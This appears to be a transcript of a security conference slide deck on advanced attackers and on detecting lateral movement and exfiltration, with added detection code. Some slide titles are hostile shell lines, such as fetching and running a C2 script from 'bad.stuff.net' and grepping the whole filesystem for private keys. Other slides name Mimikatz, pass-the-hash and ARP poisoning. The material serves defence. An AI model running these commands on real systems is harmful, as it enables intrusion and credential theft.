
Advanced Threats and Lateral Movement Detection

913 views


High level slides on attack and defense against 'advanced adversaries.' This is about as close to sales as I'll get, lol.

Published in: Technology


  1. Advanced Threats & Lateral Movement Detection
     Greg Foss, OSCP, GAWN, GPEN, GWAPT, GCIH, CEH
     Sr. Security Research Engineer, LogRhythm Labs
  2. # whoami
     • Greg Foss
     • Sr. Security Researcher
     • LogRhythm Labs – Threat Intel Team
     • Former DOE Penetration Tester
     • Focus => Honeypots, Incident Response, and Red Team
     • OSCP, GAWN, GPEN, GWAPT, GCIH, CEH, etc…
  3. # ls -lha
     1 IT Security Threats
     2 Event Correlation
     3 Detection
     4 DEMO!
  4.
  5. # man [Advanced Threats]
     • Advanced Persistent Threats
     • Organized Cyber Crime
     • Hacktivists
     • ‘Cyber Terrorists’
     • Etc…
     • Able to develop and utilize sophisticated techniques in pursuit of their target objective, from reconnaissance to data exfiltration.
     • Will leverage the full spectrum of attack vectors – social, technical, physical, etc.
     • Highly organized, highly motivated, highly resourced.
     • Willing to invest significant time and resources to compromise.
  6. It’s when, not if…
     • Mission Oriented
     • Persistent and Driven
     • Patient and Methodical
     • Focus on exponential ROI
     • Emphasis on high IP value targets
     • They will get in…
     Image: http://postfiles10.naver.net/20120823_137/ahranta1_1345681933371Je4vd_JPEG/Target.jpg
  7. Identify a ‘Hacker’
  8. Ok, for real…
     • *Simple… Correlate on odd network / host activity
     • Use the data at hand to actively detect anomalies
     • Understand how your organization will respond to a breach / outage / squirrel affecting any of the three InfoSec pillars
       • Confidentiality
       • Integrity
       • Availability
  9. Advanced Threat Tactics and Evasion
     • Threat actors of all types move slowly and quietly over time, limiting exposure and potential for discovery.
     • Trending on enterprise data over time helps to build baselines that can be used to actively identify anomalies.
  10. IT Security Threats
  11. # last && echo ‘How are they getting in??’
     • Phishing
       • 91% of ‘advanced’ attacks began with a phishing email or similar social engineering tactics.
       • http://www.infosecurity-magazine.com/view/29562/91-of-apt-attacks-start-with-a-spearphishing-email/
     • 2014 Metrics
       • Average cost per breach => $3.5 million
       • 15% higher than the previous year
       • http://www.ponemon.org/blog/ponemon-institute-releases-2014-cost-of-data-breach-global-analysis
  13. # history | more
     • It only takes one…
  14. # ./searchsploit ‘client side’ && echo ‘new exploits daily!’
  15. # cat [cve-2014-6332] >> /var/www/pwn-IE.html
  16. Event Correlation & Detection
  17. Defense in Depth
  18. Spear Phishing
  19. Phishing Attack Log Traces
  20. $ vim next.sh
     • Maintain Access…
     Image: http://www.netresec.com/images/back_door_open_300x200.png
  21. $ ./next.sh
     • Then?
     • *Nothing…
     • For a long time…
     • *not really*
     • They have attained a foothold and are now your newest employees…
  22. $ su - root
  23. # wget http://bad.stuff.net/c2.py . && ./c2.py
     • Once infected, the beachhead will beacon periodically
  24. Behavioral Analytics
     • Beaconing Activity – usually initiated over port 443 or an encrypted tunnel over port 80.
       • Can be detected with a Firewall or Web Proxy
       • Capability to decrypt SSL traffic is a huge plus
     • Behavioral analytics can be utilized to differentiate normal browsing activity from possible evidence of an infected host.
       • Using a SIEM, track the unique websites usually visited, and the overall volume of normal web activity, on a per user and a per host basis.
       • Watch for significant changes over an extended period of time.
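The two checks slide 24 describes, periodic beaconing to one destination and new destinations outside a host's baseline, as an added example that is not part of the deck. The proxy log format, the hosts and addresses, and the thresholds are constructed assumptions.

```python
# Added example, not from the slides: beaconing and new-destination checks over
# a constructed web proxy log. Field layout and thresholds are assumptions.
from collections import defaultdict
from statistics import mean, pstdev

# Constructed sample proxy log: "<epoch-seconds> <host> <user> <destination> <bytes>".
# ws01 browses normally; ws07 hits one address every 300 s with near-identical sizes.
SAMPLE_LOG = """\
1000 ws01 alice news.example.com 5120
1300 ws01 alice cdn.example.net 2200
1000 ws07 bob 203.0.113.9 300
1300 ws07 bob 203.0.113.9 300
1600 ws07 bob 203.0.113.9 310
1900 ws07 bob 203.0.113.9 300
2200 ws07 bob 203.0.113.9 300
2500 ws07 bob 203.0.113.9 305
"""

def parse(log):
    """Group request timestamps per (host, destination)."""
    sessions = defaultdict(list)
    for line in log.splitlines():
        ts, host, _user, dest, _size = line.split()
        sessions[(host, dest)].append(int(ts))
    return sessions

def find_beacons(log, min_hits=5, max_jitter=0.1):
    """Return {(host, dest): interval_seconds} for destinations a host contacts at
    near-constant intervals. Jitter = coefficient of variation of the gaps."""
    hits = {}
    for key, stamps in parse(log).items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            hits[key] = round(avg)
    return hits

def new_destinations(baseline_log, current_log):
    """Per host, destinations seen now that never appeared in the baseline period."""
    seen = defaultdict(set)
    for host, dest in parse(baseline_log):
        seen[host].add(dest)
    fresh = defaultdict(list)
    for host, dest in sorted(parse(current_log)):
        if dest not in seen[host]:
            fresh[host].append(dest)
    return dict(fresh)
```

Human browsing produces highly irregular gaps, so a low jitter score over many hits to one destination is the signal; the baseline comparison catches the slow-moving actor whose beacon interval is too long to score.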
  25. Reconnaissance
     • Ping sweeps, service discovery, etc. – NO
       • Why make unnecessary noise?
     • Instead => access network shares, web apps, and services
       • Passively gather information using available resources…
     Image: http://macheads101.com/pages/pics/download_pics/mac/portscan.png
  26. Lateral Movement
     • Dump Local System Hashes
       • Maybe crack them, maybe it’s not even necessary…
       • Pass the Hash (PtH)
     • Dump plain text passwords
       • Mimikatz -- FTW!
     • Act as an internal employee -- use legitimate means to access resources.
  27. Uncovering Internal Reconnaissance and Pivoting
     • Security Operations Goal => Reduce MTTD and MTTR
       • MTTD – Mean Time to Detect
       • MTTR – Mean Time to Respond
     • Set Traps => Honeypot / Honey Token access
     • Overt Clues => Modification of user / file / group permissions and pivoting evidence
     • Subtle Clues => VPN access from disparate geographical locations
     • Missed Opportunities => Once inside, they are now an ‘employee’…
  28. Lateral Movement Log Traces
     • Microsoft’s granular Event Identification schema (EVID), in conjunction with environment information, provides analysts with plenty of information to track attackers once they have breached the perimeter.
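Slides 27 and 28 say what to look for (honey token use, permission changes, pivoting evidence) without showing the event-level logic, so here is an added example, not from the deck, that applies those three clues to Windows Security events. The events, account names, the decoy account and the thresholds are constructed; the Event IDs 4624 (successful logon, LogonType 3 = network) and 4732 (member added to a local group) are real Microsoft IDs.

```python
# Added example, not from the slides: pivot indicators in Windows Security events.
# Event IDs used: 4624 (successful logon; LogonType 3 = network), 4732 (member added
# to a security-enabled local group). Sample events and thresholds are constructed.
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed events as (timestamp, EventID, LogonType, account, source IP, computer).
EVENTS = [
    ("2014-11-20T09:00:00", 4624, 3, "svc_backup", "10.0.0.5", "FS01"),
    ("2014-11-20T09:01:30", 4624, 3, "svc_backup", "10.0.0.5", "FS02"),
    ("2014-11-20T09:02:10", 4624, 3, "svc_backup", "10.0.0.5", "HR-WS4"),
    ("2014-11-20T09:03:45", 4624, 3, "svc_backup", "10.0.0.5", "DC01"),
    ("2014-11-20T09:20:00", 4624, 3, "alice", "10.0.0.7", "FS01"),
    ("2014-11-20T11:00:00", 4624, 3, "hd_admin_old", "10.0.0.5", "FS02"),
    ("2014-11-20T11:05:00", 4732, None, "svc_backup", "10.0.0.5", "FS02"),
]
HONEY_ACCOUNTS = {"hd_admin_old"}  # decoy credential planted for attackers to find

def logon_fanout(events, window=timedelta(minutes=10), max_hosts=3):
    """Flag (account, source IP) pairs that reach more than max_hosts distinct
    computers with network logons inside one window: a pivot signature that looks
    the same on the target whether the password was cracked or the hash was passed."""
    by_pair = defaultdict(list)
    for ts, evid, ltype, acct, ip, comp in events:
        if evid == 4624 and ltype == 3:
            by_pair[(acct, ip)].append((datetime.fromisoformat(ts), comp))
    flagged = {}
    for pair, hits in by_pair.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            hosts = {c for t, c in hits[i:] if t - start <= window}
            if len(hosts) > max_hosts:
                flagged[pair] = sorted(hosts)
                break
    return flagged

def honeytoken_logons(events):
    """Any logon with a decoy account is a trap firing: the account has no legitimate use."""
    return sorted({(acct, ip, comp) for _, evid, _, acct, ip, comp in events
                   if evid == 4624 and acct in HONEY_ACCOUNTS})

def group_membership_changes(events):
    """4732 events: the overt permission-modification clue from slide 27."""
    return [(acct, comp) for _, evid, _, acct, _, comp in events if evid == 4732]
```

Correlating the three outputs on the shared source IP (10.0.0.5 in the constructed data) is the "environment information" step: one source that fans out, touches the decoy and then changes group membership is pivoting evidence, not three unrelated alerts.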
  29. Passive Data Extraction
     • Well Poisoning via UNC Paths
     • SMB Replay
     • Help Desk Tickets
     • Responder – by SpiderLabs
     • Keylogging
  30. Passive Traffic Analysis
     • Analyze / capture anything that comes across the wire.
     • ARP poison hosts of interest, take over switches/routers, etc.
     Image: https://i.chzbgr.com/maxW500/5579525376/h7D009AE4/
  31. # grep -rhi ‘private key’ /* && echo “Identify Key Resources”
     • Keys / Certificates / Passwords
     • File Shares and Databases
     • Intellectual Property
     • Domain Controllers / Exchange / etc.
     • Business Leaders – CXO, Director, VP, etc.
     • Administrative Assistants
     Image: http://www.mobilemarketingwatch.com/wordpress/wp-content/uploads/2011/07/Top-Secret-Tip-To-Pick-SMS-Keyword.jpeg
  32. # wget http://target/files.tgz && echo “Data Exfiltration”
     • Target data identified, gathered, and moved out of the environment.
     • Data is normally leaked in a ‘hidden’ or modified format; rarely is the actual document extracted.
       • Emails and Employee PII
       • Intellectual Property
       • Trade Secrets
     Image: http://www.csee.umbc.edu/wp-content/uploads/2013/04/ex.jpg
  33. Data Exfiltration is Often Not ‘Advanced’
  34. Catching Data Exfiltration
     • Granular restrictions on sensitive files and directories to specific groups or individuals; alert on any abnormal file access / read / write / etc.
     • DNS exfiltration or sometimes even ICMP tunneling in high security environments
     • Non-SSL over ports 443 / 8443, encrypted TCP over ports 80 / 8080
     • Abnormal web server activity, newly created files, etc.
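Two of the slide 34 checks worked through as an added example that is not from the deck: the DNS-exfiltration shape (many unique, long, high-entropy subdomains under one domain from one client) and non-SSL traffic on a TLS port. The query log, client addresses, the synthetic tunnel labels and all thresholds are constructed; the registered-domain helper assumes two labels and would use a public-suffix list in practice.

```python
# Added example, not from the slides: two exfiltration checks from slide 34
# (DNS tunnelling and non-TLS traffic on 443). Sample data and thresholds are constructed.
import math
from collections import defaultdict

# Constructed DNS query log "<client> <qname>". 10.0.0.9 sends encoded chunks as labels
# under one domain, the shape of a DNS tunnel; the labels are synthetic, not real data.
TUNNEL_LABELS = [("0123456789abcdef" * 2)[i:i + 24] for i in range(6)]
DNS_LOG = "\n".join(["10.0.0.5 www.example.com", "10.0.0.5 mail.example.com",
                     "10.0.0.5 cdn.example.net"] +
                    [f"10.0.0.9 {lbl}.t.example.org" for lbl in TUNNEL_LABELS])

def registered_domain(qname):
    """Last two labels; a public-suffix list would be used in production (assumption)."""
    return ".".join(qname.rstrip(".").split(".")[-2:])

def shannon_entropy(s):
    """Bits per character; hex/base32/base64 chunks score far above English words."""
    return -sum(s.count(c) / len(s) * math.log2(s.count(c) / len(s)) for c in set(s))

def dns_tunnel_candidates(log, min_unique=5, min_label_len=20, min_entropy=3.0):
    """{(client, domain): unique_qnames} where a client resolves many distinct,
    long, high-entropy subdomains of one registered domain."""
    seen = defaultdict(set)
    for line in log.splitlines():
        client, qname = line.split()
        seen[(client, registered_domain(qname))].add(qname)
    out = {}
    for key, names in seen.items():
        odd = [n for n in names
               if len(n.split(".")[0]) >= min_label_len
               and shannon_entropy(n.split(".")[0]) >= min_entropy]
        if len(odd) >= min_unique:
            out[key] = len(names)
    return out

def tls_port_mismatch(dst_port, first_bytes):
    """True when traffic on a TLS port does not start with a TLS handshake record
    (content type 0x16, version 0x03 0x0X): the 'non-SSL over 443 / 8443' check."""
    return dst_port in (443, 8443) and not (
        len(first_bytes) >= 3 and first_bytes[0] == 0x16 and first_bytes[1] == 0x03)
```

The entropy and length thresholds are the tunable part: CDN and anti-virus update hostnames also produce long labels, so in practice the per-domain unique-name count over a day is what separates a tunnel from noisy but legitimate infrastructure.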
  35. It all comes down to Event Correlation
  36. DEMO
  37. Closing Thoughts…
     • Don’t be hard on the outside, soft and chewy on the inside…
     • Implement Layer 3 (network) Segmentation and Least User Privilege
     • Understand your environment and log data so that you can accurately correlate physical and cyber events
     • Implement URL filtering, stateful packet inspection, and binary analysis
     • Actively alert on and respond at the earliest signs of lateral movement and reconnaissance observed within your environment
     • The earlier you can detect attackers the better…
  38. Thank You!
     QUESTIONS?
     Greg Foss, OSCP, GAWN, GPEN, GWAPT, GCIH, CEH
     Senior Security Research Engineer
     Greg.Foss[at]logrhythm.com
     @heinzarelli
